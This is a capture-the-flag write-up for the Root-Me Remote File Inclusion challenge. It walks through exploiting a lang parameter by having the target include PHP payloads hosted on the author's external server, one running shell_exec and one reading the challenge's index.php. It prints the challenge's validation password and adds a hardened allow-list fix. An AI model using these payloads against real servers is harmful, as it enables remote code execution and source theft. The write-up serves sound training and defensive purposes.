Rootme RFI
Root-me.org: Remote File Inclusion (RFI)
In this challenge we need to find the PHP source code of the page. The title says it's related to RFI. If we take a look at the challenge page we notice that it takes the language as a parameter.
http://challenge01.root-me.org/web-serveur/ch13/?lang=fr
That parameter is most probably the vulnerable part. Let’s try to change it to something random and see how the server responds.
curl http://challenge01.root-me.org/web-serveur/ch13/?lang=haha
Warning: include(haha_lang.php): failed to open stream: No such file or directory in /challenge/web-serveur/ch13/index.php on line 18
Warning: include(): Failed opening 'haha_lang.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /challenge/web-serveur/ch13/index.php on line 18
...
We get a warning saying that haha_lang.php could not be opened because it does not exist, so the server is building the file name as <parameter>_lang.php and handing it to include(). The warning also leaks where this happens: /challenge/web-serveur/ch13/index.php, line 18, which is exactly the source we are after. include() accepts a URL when allow_url_include is enabled, so let's try to load a page from an external website. Since the server appends _lang.php, we'll create a PHP file named yo_lang.php and pass only the part before the suffix in the parameter.
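To make the weakness and its fix concrete, here is an added example (mine, not the challenge's index.php or any root-me code) of the include pattern the warning implies, beside a hardened version. The exact original line is unknown: the shape include($_GET['lang'] . '_lang.php') and the language table are assumptions.

```php
<?php
// Added example (not the challenge's real index.php): a reconstruction of the
// include pattern that the "include(haha_lang.php)" warning implies, next to a
// hardened version. The exact original line is unknown; the shape
// include($_GET['lang'] . '_lang.php') is an assumption, and the language
// table below is made up.

// Vulnerable: the request parameter flows into include() unchanged. With
// allow_url_include=On a URL works (RFI, as in the challenge); with it Off the
// same line is still a local file inclusion of any readable *_lang.php path.
function load_lang_vulnerable(string $lang): void
{
    include $lang . '_lang.php';
}

// Hardened: the parameter is a key into an allow-list, never a path fragment.
const LANG_FILES = [
    'fr' => 'fr_lang.php',
    'en' => 'en_lang.php',
];

function load_lang_safe(string $lang): bool
{
    if (!array_key_exists($lang, LANG_FILES)) {
        return false;                    // unknown key: refuse, do not guess
    }
    // __DIR__ pins the include to this script's own directory, and the file
    // name comes from our table, so no user-controlled byte reaches include().
    include __DIR__ . '/' . LANG_FILES[$lang];
    return true;
}

$lang = $_GET['lang'] ?? 'fr';
if (!load_lang_safe($lang)) {
    http_response_code(400);
    exit('unsupported language');
}

// Defence in depth belongs in php.ini, not only in the code:
//   allow_url_include = Off   ; include()/require() refuse http:// and ftp:// wrappers
//   display_errors    = Off   ; the warnings above leaked the script path and line
//   disable_functions = shell_exec,exec,system,passthru  ; the set this challenge server disables
```

The allow-list is the real fix; the php.ini lines only limit what an attacker gets once a bug like the first function exists, as the rest of this writeup shows.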
Our PHP script will use shell_exec() to run the command ls on the machine (the command has to be a string; a bare ls is an undefined constant and is an error on PHP 8):
<?php echo shell_exec('ls'); ?>
Now we'll put our script on a web server we control. If you don't have one, the command
sudo python -m SimpleHTTPServer 80
(python3 -m http.server 80 on current systems) serves the current directory. You will most probably also need to forward the port on your router so the challenge server can reach it.
Now that the file is on our web server, let's do the RFI. The file is called yo_lang.php, so the parameter is the URL up to the suffix:
curl http://challenge01.root-me.org/web-serveur/ch13/?lang=https://get.uid0.in/yo
-Ringzer0-188.html
Asisctf.html
Billu_b0x.html
Brainpan2.html
Brainspan1.html
...
What happened is that the command ran on our server instead of theirs: we got the result of ls from our own web root. Our web server has PHP enabled, so when the challenge server fetched yo_lang.php our server executed it and returned only its output, and the target then included plain text rather than code. To fix it we need to tell our web server to serve .php files as-is instead of executing them (a bare python SimpleHTTPServer already does that, which is why it works without further setup). On Apache, put the following in the .htaccess of the directory holding the file:
<Files *.php>
SetHandler None
</Files>
This stops Apache from handing *.php files to the PHP module, so they are served as plain text (the directive needs AllowOverride FileInfo, or broader, to be honoured from .htaccess). Check it with curl https://get.uid0.in/yo_lang.php: the response must start with <?php. Then we'll resend the command and see the result.
curl http://challenge01.root-me.org/web-serveur/ch13/?lang=https://get.uid0.in/yo
Warning: shell_exec() has been disabled for security reasons in https://get.uid0.in/yo_lang.php on line 4
...
So shell_exec() is disabled, and so are exec, system and passthru (the server's disable_functions list). We need to find another way. Since the goal is to read the source, I'll use a function we previously used to read a file: file_get_contents reads a file into a string, which we then echo. Because the included file runs inside the target's PHP process, with the working directory of the challenge's index.php, a relative "index.php" refers to the challenge's own index.php, not ours.
<?php
// read the target's own index.php and print it verbatim
$yo=file_get_contents ("index.php");
echo $yo;
?>
Let’s try to run it again.
curl http://challenge01.root-me.org/web-serveur/ch13/?lang=https://get.uid0.in/yo
<?php
/*
Congratz!
Le mot de passe de validation est :
The validation password is :
R3m0t3_iS_r3aL1y_3v1l
*/
...
And there it is.